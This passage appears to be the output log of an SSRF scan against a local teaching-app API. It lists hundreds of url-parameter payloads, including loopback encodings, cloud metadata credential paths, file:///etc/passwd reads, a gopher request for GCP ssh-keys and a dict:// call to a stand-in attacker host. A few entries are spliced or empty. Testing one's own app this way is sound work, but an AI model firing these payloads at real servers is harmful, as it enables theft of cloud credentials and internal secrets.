`http://localhost:4200/api/tasks?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tasks?url=0%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.1` +- Testing: `http://localhost:4200/api/tasks?url=localtest.me` +- Testing: `http://localhost:4200/api/tasks?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/tasks?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tasks?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tasks?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tasks?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tasks?url=0` +- Testing: `http://localhost:4200/api/tasks?url=127.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.1` +- Testing: `http://localhost:4200/api/tasks?url=localhost` +- Testing: `http://localhost:4200/api/tasks?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/tasks?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/tasks?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/tasks?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/tasks?url=7F000001` +- Testing: `http://localhost:4200/api/tasks?url=2130706433` +- Testing: `http://localhost:4200/api/tasks?url=6425673729` +- Testing: `http://localhost:4200/api/tasks?url=127001` +- Testing: `http://localhost:4200/api/tasks?url=127_0._0_1` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tasks?url=localtest.me` +- Testing: `http://localhost:4200/api/tasks?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tasks?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tasks?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tasks?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=0x7f000001` +- Testing: `http://localhost:4200/api/tasks?url=017700000001` +- Testing: `http://localhost:4200/api/tasks?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/tasks?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/tasks?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tasks?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/tasks?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/tasks?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/tasks?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tasks?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254` +- Testing: `http://localhost:4200/api/tasks?url=2852039166` +- Testing: `http://localhost:4200/api/tasks?url=7147006462` +- Testing: `http://localhost:4200/api/tasks?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/tasks?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/tasks?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/tasks?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/tasks?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tasks?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/tasks?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/tasks?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/tasks?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/tasks?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/tasks?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tasks?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/tasks?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/tasks?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/tasks?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/tasks?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/tasks?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tasks?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/tasks?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tasks?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/tasks?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/tasks?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tasks?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/tasks?url=3232235521` +- Testing: `http://localhost:4200/api/tasks?url=3232235777` +- Testing: `http://localhost:4200/api/tasks?url=425.510.425.510` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/tasks?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=instance-data` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A22` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A443` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/tasks?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/tasks?url=loopback` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A22` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A80` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A443` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/tasks?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/tasks?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tasks?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/tasks?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/tasks?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/tasks?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/tasks?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/tasks?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/tasks?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tasks?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tasks?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tasks?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tasks?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tasks?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tasks?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tasks?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tasks?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tasks?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/tasks?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/tasks?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tasks?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tasks?url=0%2F` +- Testing: `http://localhost:4200/api/tasks?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/teaching_periods +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/teaching_periods?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=0` +- Testing: `http://localhost:4200/api/teaching_periods?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.127.127.127` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.1.3` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.0` +- Testing: `http://localhost:4200/api/teaching_periods?url=2130706433` +- Testing: `http://localhost:4200/api/teaching_periods?url=017700000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com.localhost` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=localtest.me` +- Testing: `http://localhost:4200/api/teaching_periods?url=http%3A%400%2F` +- Testing: 